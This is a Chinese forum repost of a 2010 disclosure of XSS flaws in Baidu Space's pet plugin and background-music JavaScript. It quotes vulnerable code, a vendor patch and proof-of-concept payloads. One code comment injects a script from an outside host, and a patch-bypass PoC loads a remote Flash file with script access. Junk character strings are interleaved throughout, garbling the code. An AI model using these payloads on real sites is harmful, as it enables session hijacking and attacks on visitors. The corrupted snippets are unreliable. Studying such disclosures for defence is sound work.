百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS. ) d# S! x# F" h. D1 S) @
) J. G& A$ w& @: U4 p
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
; u' m! t, r9 F: O& E. |2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
+ n* l. ^0 r( [4 S7 ]/ A/ u2 [0 o" \& d$ {; n0 l( Y
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p> ' R) x9 z+ k8 I/ s# J4 s. [* u
其中BdUtil.insertWBR为
, f7 S( i% ]: A* ^- e3 Lfunction(text, step) {
5 Q) a0 ^2 c2 f) p var textarea = textAreaCache || getContainer();
' A: C6 ]+ G1 i if (!textarea) {
2 F3 e+ O# A: ~ \) R2 W: ^ return text; + m2 h' j ^* `
} 5 N& r7 L) a6 B% B, i- x
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); " @* e/ I6 e6 @* E" k4 g
var string = textarea.value;
- [1 C4 w J3 j: @) d var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
& p2 M; K3 G& v% X var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
9 a4 ~$ g# z7 _+ J% E return result; 1 ?: z3 f2 i1 O1 S$ z# t
}
/ }9 D% ~( I4 i3 ?8 n( \2 A( [在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. ) u* c7 w' k3 I& L/ W' M
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> 2 W# }" Y# H" u3 b" n
2 p4 V/ Y" S; B, B0 s$ l/ X2 v
二:creatbgmusic() Dom-Xss Bug
! i- [1 ~) @$ q) ?百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 / ^# k9 A* p, i/ N1 F1 j
; ~ `2 Z; D$ m在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: 4 l- f5 S: Z: |, y. V
: W7 {% e- y$ h3 h. @+ qfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { 1 c, y" V% T2 ]* W8 D2 ]+ g% s8 [
//传入的murl赋值到bgmusic1和bgmusic2中
# f. f; h0 N# u //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 % \: C& O# S+ v, |
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">"; & x$ Q5 |) D' b) J/ }/ l2 }
if (musicnum <= 1) {
$ H/ u A5 q2 o8 }, d# b bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; $ Y' q! |/ J }% w% }
} ) g/ Z- D7 t2 f
bgmusic1 += "</OBJECT>";
; {1 k1 i5 |0 b# D3 X var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; ' @6 r' B% x' l
if (musicnum <= 1) {
+ _. q) a& I# q# f. S- {( h bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; " @1 Q) f% T+ k3 s2 K8 I
}
' f: W8 ?* W* y5 i bgmusic2 += "> </EMBED>"; + P0 ^0 H1 L3 a Y/ Z
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; . Q/ Y6 ~1 a0 x' ^
var bgmus = detectWMP();
9 T; P0 ~# g7 x1 Q- |7 }5 L7 { if (functype == "FckMusicHelper") { $ `5 {9 D) P5 F7 l* Y
if (bgmus.installed) { , o2 C1 {" p# v/ \& E- O
if (bgmus.type == "IE") { ; i1 A5 u6 z7 s0 t% Q- i
return bgmusic1; 8 x+ F( V7 W, `# {; ?2 u6 y- B+ H( _
} else if (bgmus.type == "NS") {
- _+ ]+ w+ Z# y return bgmusic2;
# Z6 r8 M/ l4 u) f0 f4 a, J7 {# ~; `3 h } : B0 ~; Y. S! ?! ~0 }# B
} else { + t) M' v$ D3 @6 v; n( @* l
return bgmusic3;
$ s- E, Z, K9 f$ [ } ! L. {- T/ x% d8 H7 V" H) Z' \, Z
} else {
$ P& u- V% j* {! g if (bgmus.installed) {
. ~- U8 A8 L( ? //document.write 直接输出bgmusic变量 导致xss
7 l5 N3 O# v( K. D if (bgmus.type == "IE") { 2 R3 j! k1 T( U( P; y
document.write(bgmusic1); 6 |& I9 H7 |! i5 T
} else if (bgmus.type == "NS") { ' s/ \3 M/ x7 y5 g0 o- J# t2 V- {
document.write(bgmusic2); ( M, n. @" `2 e- U7 t/ _
} {7 ~: P7 m0 Y% E9 h9 }
} else { / x- s: K+ `9 m+ i3 ` \
document.write(bgmusic3); & J* b. K# o. M
}
0 |6 \1 d! A, y# _0 m return "";
0 X0 E3 O8 j4 D9 Y- @7 p } % x; e7 X- V# m) b! |
} . X7 P0 w) o, ^: N2 b
+ v) U1 t, o+ P% z7 J在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: % q) Z$ L: p" ~/ k! E m
8 i& z, l! u- @; J0 J6 w4 bfunction initBlogTextForFCK(){ 5 { G: b0 A/ a( d% E
//fck init music - Q7 i% X2 z& A
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
) G- ~, e& o; f# Ivar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
2 n+ g( D" M+ y$ Kvar isAutoPlay=true;
4 p7 I2 H' r9 t9 Y& v% G5 T3 Jfor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. $ D3 E& `% z5 { y* Z
var img=imgBox; ) }. c4 E% s, A( V- \
if(img.getAttribute(’rel’)){
- ~0 b7 d, X' x$ j C8 k6 L2 j$ m7 f var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc , a2 m9 t7 }1 f7 a$ y, z
var musicDiv = document.createElement("SPAN"); / ^$ y8 s: d5 B0 n" [- c$ P% Q. H3 E
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp] & l8 ]( F4 S- a+ g
p! ~4 Z; u0 W7 u- e' ~
.......................... , `3 |$ d- k6 F8 `2 ]3 \/ S) Q6 [
" C# g! N* t" T: g: p8 O( k //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
! s1 _1 E1 Z Q2 r; [$ ~ d) _ var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
: @# [& R1 J6 f shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); 5 I4 n, P' N# V# I
musicDiv.innerHTML=shtml;
, ]& j) O0 h9 ?2 e i--;n--;
; J" d9 k6 c7 D/ |$ L3 \0 |* {. R }
+ E2 t' m X4 o# W& w) G* N7 \} - I( ^3 \2 q9 ^. U, W; e
; x/ g- n2 ~( M; e( M8 e5 }3 B% t从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
! l0 n6 d p+ n 2 X8 P2 @3 Z0 r0 c
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> 7 O0 S+ P( m7 A, |7 ~, p
# x4 Y+ Z0 w& {; E: t* G" d2 v
等待官方补丁
( y0 F1 C9 b# ]6 J" |1 n: Q2 Y: Z) W3 y' H. ?- \, A3 [
update 2010年5月13日 - T& s' l) h) B4 h& @3 j
( `# J! [7 \4 Z% ~0 k6 f( B( g
官方补丁: : i, ]" n+ Y) S5 t7 q9 l4 Z
- s( h) K* e1 n/ [% e
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); ( F, [. Q# y- ^% o2 @: g
改为: ) o( [8 b! }4 o4 d- a; @
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
* l; d$ K: v, E" U% s7 \& Z1 a" B
, O1 x: H! B! f3 [) s& @update 2010年5月13日 21:50:37
% y$ \2 o, z; N. E' j
$ Q. v/ x3 j3 y3 M补丁存在漏洞 没有过滤" 可以继续跨:
$ c' Y" W8 h( C# V* b
4 v9 v ^9 k) @) D' o1 E$ eNEW POC:
4 d, e2 F! n! q# M
7 n5 ?0 [# q( S8 ~) y0 r# a<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" 5 }" {% g4 }1 M- x
& K3 [) O z3 P' c0 ballowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>$ \2 E. K) ]6 Z
; P: w9 W( S+ T+ q) Y- U* [
|
发表于 2013-8-24 11:51:11
收藏
支持
反对